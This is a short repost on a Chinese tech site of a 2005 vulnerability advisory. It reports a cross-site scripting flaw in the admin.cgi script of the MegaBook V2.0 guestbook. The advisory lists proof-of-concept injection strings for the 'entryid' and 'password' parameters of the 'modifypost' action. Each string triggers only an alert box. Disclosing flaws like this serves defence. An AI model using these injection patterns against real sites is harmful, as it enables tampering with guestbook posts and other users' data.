首页 电脑 电脑学堂 查看内容

MegaBook V2.0跨站脚本漏洞测试方法

2005-5-8 11:31 962 0

摘要: 文章作者:SpyHatThe ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross SiteScriptin...
关键词: modifypost entryid action password Guestbook Scripts script tested 66 CGI

文章作者:SpyHatThe ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross SiteScripting, which will allow the attacker to modify the post in the guestbook. Theaffected scripts is admin.cgi URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) I have tested the script with the following query:?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>I have also tested the script with theses POST variables:action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部